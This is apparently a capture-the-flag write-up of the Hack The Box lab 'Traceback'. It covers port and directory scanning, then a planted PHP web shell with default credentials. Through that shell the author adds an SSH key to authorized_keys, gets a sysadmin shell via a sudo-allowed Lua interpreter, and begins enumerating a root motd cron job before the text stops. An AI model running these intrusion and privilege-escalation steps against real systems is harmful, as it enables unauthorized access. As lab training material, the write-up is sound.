← Home

Hack The Box : Traceback

24 April, 2020

Discovery

Starting with an Nmap scan

kali@kali:~$ nmap -p 1-10000 -sC -sT -sV 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-14 15:15 EDT
Nmap scan report for 10.10.10.181
Host is up (0.15s latency).
Not shown: 9997 closed ports
PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp  open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
876/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 274.29 seconds

So there's a website

I didn't get any hints from this straightaway so I ran gobuster using a big wordlist but didn't get anything useful from it

kali@kali:~$ ./gobuster dir -u "http://traceback.htb/" -w /usr/share/dirb/wordlists/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://traceback.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/04/15 14:16:52 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
[ERROR] 2020/04/15 14:20:45 [!] Get http://traceback.htb/mockups: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:48 [!] Get http://traceback.htb/mostra: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:48 [!] Get http://traceback.htb/mostres: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:48 [!] Get http://traceback.htb/mostrar: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:48 [!] Get http://traceback.htb/motd: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:48 [!] Get http://traceback.htb/mot: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:48 [!] Get http://traceback.htb/moteur: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:48 [!] Get http://traceback.htb/mother: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:48 [!] Get http://traceback.htb/mothers-day: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:48 [!] Get http://traceback.htb/mothersday: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:55 [!] Get http://traceback.htb/motion: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:58 [!] Get http://traceback.htb/moto: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:58 [!] Get http://traceback.htb/moto-news: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:58 [!] Get http://traceback.htb/moto1: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:58 [!] Get http://traceback.htb/motor: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:58 [!] Get http://traceback.htb/motorcycle: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:58 [!] Get http://traceback.htb/motorcycles: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:58 [!] Get http://traceback.htb/motorola: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:58 [!] Get http://traceback.htb/motorrad: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:58 [!] Get http://traceback.htb/motors: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:20:59 [!] Get http://traceback.htb/mount: dial tcp 10.10.10.181:80: connect: no route to host
[ERROR] 2020/04/15 14:21:03 [!] Get http://traceback.htb/movie: dial tcp 10.10.10.181:80: connect: no route to host
[ERROR] 2020/04/15 14:21:06 [!] Get http://traceback.htb/movie-reviews: dial tcp 10.10.10.181:80: connect: no route to host
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/movies: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/movietimes: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mouse: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mouse1: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mountain: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/movabletype: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mov: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/move: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/moved: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/movers: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/movetopic: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/movil: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/moving: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/movimientos: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/moviles: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/moxiebin: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mozart: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mozilla: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mp: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mp3s: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mp3: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mp3player: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mp3files: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mpg: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mpc: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mpa: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mpi: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mpeg: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:08 [!] Get http://traceback.htb/mpanel: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/mqseries: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/mps: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/ms: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/mr: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/mrtg: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/mrbs: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/mpp: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/ms-sql: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/mqs: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/mq: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msd: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msds: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msadc: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msa: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msft: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msearch: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msg: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msgboard: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msc: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msadm: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msiecrawler: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msm: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msn: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msi: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msgcenter: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msgs: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msgcnt: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msk: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msn_ru: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:09 [!] Get http://traceback.htb/msie: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mt: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mspace: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/msoffice: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mso: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mssql: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/msp: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/msr: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/msql: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mstpre: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mt-bin: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mt-test: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mt-static: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mtb100: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mt3: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mt-gb: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mta: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mt4: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mtg: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mt_images: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mtc: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mtree: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mthemes: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mu-fr: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mtv: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/muestra: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mu-gb: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/muenchen: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mu-plugins: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mu: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mtstatic: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/muestras: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mult: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mug: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mugs: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/multi: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/multfilmi: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/mug-special: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/muffin: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/multi-media: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:10 [!] Get http://traceback.htb/muj-ucet: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/multisites: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/mumbai: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/multibox: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/multimedia: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/multichannelma: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/murmansk: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/munin: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/murcia: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/multiservers: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/mum: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/musical: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/musicas: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/musica: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/music: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/muse: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/murphy: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/musicl: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/mus: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/museum: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/musicad: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/musics: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/musicsp: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/mutant: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/mustang: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/must: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/musings: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/musique: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/musicsearch: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/musik: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:11 [!] Get http://traceback.htb/musiclp: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:12 [!] Get http://traceback.htb/mvc: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:12 [!] Get http://traceback.htb/muzika: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:12 [!] Get http://traceback.htb/mv-service: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:12 [!] Get http://traceback.htb/mvmcontrollercmd: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:12 [!] Get http://traceback.htb/mutui: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:12 [!] Get http://traceback.htb/mv: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:12 [!] Get http://traceback.htb/mutual: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:12 [!] Get http://traceback.htb/mwf: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:12 [!] Get http://traceback.htb/mwaextraedit2: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:21:12 [!] Get http://traceback.htb/mw: dial tcp 10.10.10.181:80: connect: connection refused
[ERROR] 2020/04/15 14:22:25 [!] Get http://traceback.htb/robin: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:22:25 [!] Get http://traceback.htb/robinhoo: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:22:25 [!] Get http://traceback.htb/robo: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:22:25 [!] Get http://traceback.htb/robot: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:22:25 [!] Get http://traceback.htb/robotech: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:22:25 [!] Get http://traceback.htb/robot-trap: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:22:25 [!] Get http://traceback.htb/robotics: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:22:25 [!] Get http://traceback.htb/robots: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:22:25 [!] Get http://traceback.htb/robots.txt: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/04/15 14:22:25 [!] Get http://traceback.htb/robotstats: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
/server-status (Status: 403)
===============================================================
2020/04/15 14:23:50 Finished
===============================================================

Looking at the source code of the website for hints, there's a comment about web shells

Web shells are a pretty common way of gaining access to systems through websites, more about them here

After digging around some more on the website contents and it's author. I found two repositories on the author's GitHub Xh4h

  1. TFSC: Temporary File Source Code disclosure script

tfsc is an automated and standalone tool to find backup files that may disclose the website's source code.

  1. Web-Shells: Some of the best web-shells that you might need

I downloaded the PHP files from 2 and attempted to find them using 1. 

kali@kali:~$ python tfsc/tfsc.py -u http://traceback.htb -f alfa3.php,alfav3.0.1.php,andela.php,bloodsecv4.php,by.php,c99ud.php,cmd.php,configkillerionkros.php,
jspshell.jsp,mini.php,obfuscated-punknopass.php,punk-nopass.php,punkholic.php,r57.php,smevk.php,wso2.8.5.php

                  ________________________________________
         (__)    /                                        \
         (oo)   (   Temporary File Source Code Disclosure  )
  /-------\/ --' \________________________________________/ 
 / |     ||
*  ||----||             

Loading payloads . . .
[http://traceback.htb/#alfa3.php#] Request code: 200
[http://traceback.htb/#alfav3.0.1.php#] Request code: 200
[http://traceback.htb/#andela.php#] Request code: 200
[http://traceback.htb/#bloodsecv4.php#] Request code: 200
[http://traceback.htb/#by.php#] Request code: 200
[http://traceback.htb/#c99ud.php#] Request code: 200
[http://traceback.htb/#cmd.php#] Request code: 200
[http://traceback.htb/#configkillerionkros.php#] Request code: 200
[http://traceback.htb/#jspshell.jsp#] Request code: 200                                                                              
[http://traceback.htb/#mini.php#] Request code: 200                                                                                  
[http://traceback.htb/#obfuscated-punknopass.php#] Request code: 200                                                                 
[http://traceback.htb/#punk-nopass.php#] Request code: 200                                                                           
[http://traceback.htb/#punkholic.php#] Request code: 200                                                                             
[http://traceback.htb/#r57.php#] Request code: 200                                                                                   
[http://traceback.htb/#smevk.php#] Request code: 200                                                                                 
[http://traceback.htb/#wso2.8.5.php#] Request code: 200                                                                              
144 URLs attempted, 16 files found.

This wasn't of much use, all the above URLs were false positives, because they were logically same as http://traceback.htb, the # just meant a link to an anchor.

So I used Gobuster with the above list as a source

kali@kali:~$ ./gobuster dir -u "http://traceback.htb/" -w php.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://traceback.htb/
[+] Threads:        10
[+] Wordlist:       php.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/04/18 15:01:50 Starting gobuster
===============================================================
/smevk.php (Status: 200)
===============================================================
2020/04/18 15:01:52 Finished
===============================================================

Bingo! Found a valid path to explore.

Looking at the file smevk.php, if you decode the base64 string that is being eval()ed you'll find that it's a bunch of PHP that enables a dashboard

User

The credentials to this dashboard are in smevk.php itself : admin ; admin

Using the Change dir option to change the directory to ~/.ssh, I found the authorized_keys file

Using the bottom left button to edit, I added my public key to this file.

Now I could login using ssh

kali@kali:~/Documents$ ssh webadmin@traceback.htb
The authenticity of host 'traceback.htb (10.10.10.181)' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'traceback.htb,10.10.10.181' (ECDSA) to the list of known hosts.
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 



Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Apr 19 01:14:12 2020 from 10.10.14.184
webadmin@traceback:~$ ls -ltrh
total 12K
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt
webadmin@traceback:~$ cat note.txt 
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

lua was by itself not present

webadmin@traceback:~$ lua -v
bash: lua: command not found

webadmin's directories didn't have anything interesting either. I tried to see if I could do anything using sudo and indeed I could execute something very specific.

webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

Luvit is an implementation of Node.js APIs in Lua.

Luvit is a single binary that contains the lua vm, libuv, openssl, miniz as well as a host of standard libraries implemented in lua that closely resemble the public node.js APIs. You give it a lua script to run and it runs it in the context of this system.

You can read more about Luvit here

A very simple Lua script gave me shell as sysadmin

os.execute("/bin/bash -i")

webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit script.lua
sysadmin@traceback:~$ whoami
sysadmin
sysadmin@traceback:~$ pwd
/home/webadmin
sysadmin@traceback:~$ cd /home/sysadmin/
sysadmin@traceback:/home/sysadmin$ ls -ltrh
total 5.4M
-rwxrwxr-x 1 sysadmin sysadmin 4.2M Aug 24  2019 luvit
-rw------- 1 sysadmin sysadmin   33 Apr 18 23:18 user.txt

There it is...

Root

This time I couldn't run anything using sudo 

sysadmin@traceback:~$ sudo -l
[sudo] password for sysadmin:

There was nothing on the crontab

sysadmin@traceback:~$ crontab -l
no crontab for sysadmin

Enumerating sysadmin further, I tried to see what processes were running and after running ps aux multiple times I found this in the output

root       2498  0.0  0.0   4628   780 ?        Ss   04:28   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

/etc/update-motd.d/ is a way to generate dynamic MOTD (Message of the Day), otherwise restricted to the /etc/motd file containing static text

This framework was introduced by Ubuntu so their manual page covers all the details.

Interesting bit of information from the above manual page, motd scripts are executed as root

Executable scripts in /etc/update-motd.d/* are executed by pam_motd(8) as the root user at each login, and this information is concatenated in /var/run/motd

Checking the directory /var/backups/.update-motd.d/

sysadmin@traceback:/home/sysadmin$ cd /var/backups/.update-motd.d/
sysadmin@traceback:/var/backups/.update-motd.d$ ls -ltrh
total 24K
-rwxr-xr-x 1 root root  299 Aug 25  2019 91-release-upgrade
